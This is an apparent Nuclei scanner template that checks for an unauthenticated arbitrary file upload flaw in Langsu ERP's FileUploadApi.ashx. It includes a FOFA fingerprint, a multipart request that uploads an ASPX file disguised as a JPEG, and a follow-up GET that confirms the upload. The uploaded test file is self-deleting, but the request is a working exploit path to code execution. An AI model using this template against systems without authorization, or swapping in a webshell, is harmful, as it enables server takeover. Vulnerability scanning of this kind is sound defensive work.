http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - ([0-9]+/\w+\.aspx)
          type: regex
      raw:
        - |
          POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
          Accept-Encoding: gzip, deflate
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
          Accept: */*
          Connection: close

          ------WebKitFormBoundaryFfJZ4PlAZBixjELj
          Content-Disposition: form-data; name="file"; filename="{{username}}.aspx"
          Content-Type: image/jpeg

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /fileRoot/WebUpload/file//{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: langsuERP-FileUploadApi_ashx-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
        朗速ERP FileUploadApi.ashx 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 朗速ERP FileUploadApi.ashx 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/OqZZUdO3IhnS8kyrSFiqug?token=564303397&lang=zh_CN
    severity: high
    tags:
        - 朗速ERP
        - Bootstrap
variables:
    username: '{{to_lower(rand_base(6))}}'
